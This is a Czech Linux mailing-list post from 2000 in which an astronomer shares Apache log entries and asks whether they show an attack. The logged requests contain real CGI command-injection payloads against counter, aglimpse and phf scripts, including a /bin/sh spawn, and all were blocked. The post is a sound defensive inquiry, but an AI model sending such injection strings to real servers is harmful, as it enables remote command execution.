pokus o utok pres http ?

Petr Skoda skoda na sunstel.asu.cas.cz
Čtvrtek Květen 4 10:45:18 CEST 2000



Vazeni tohle se mi objevilo v logu apache (mam zatim host.deny vsude krome
nasi podsite, takze zjevne neuspel, ale nelibi se mi to - zvlaste zminky o
shellu. Je to nejaky pokus o utok ?

[skoda na alhena httpd]$ more access_log.3
strauss.udel.edu - - [14/Apr/2000:03:09:22 +0200] "GET
/cgi-bin/counter/nl/ord/l
ang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0" 403 333
strauss.udel.edu - - [14/Apr/2000:03:09:54 +0200] "POST /cgi-bin/test-cgi
HTTP/1
.0" 403 287
strauss.udel.edu - - [14/Apr/2000:03:10:18 +0200] "GET
/cgi-bin/aglimpse/80|IFS=
_;CMD=_echo\;echo_id-aglimpse\;uname_-a\;id;eval$CMD; HTTP/1.0" 403 348
strauss.udel.edu - - [14/Apr/2000:03:10:34 +0200] "POST
/cgi-bin/phf?Qname=x%0a/
bin/sh+-s%0a HTTP/1.0" 403 282


podotykam, ze zadne takove cgi-bin skripty nemam , ale o glimpsu jsem
uvazoval - je v nem nejaka chyba ? 

Diky za stopy

************************************************************************* 
*  Petr Skoda                         Tel   : (0204) 649201, l. 361     * 
*  Stelarni oddeleni                          (0204) 620361, 620136     *
*  Astronomicky ustav AVCR            Fax   : (0204) 620250             *
*  251 65 Ondrejov                    e-mail: skoda na sunstel.asu.cas.cz  *
*  Ceska republika                            pskoda na mbox.cesnet.cz     *
*************************************************************************



Další informace o konferenci Linux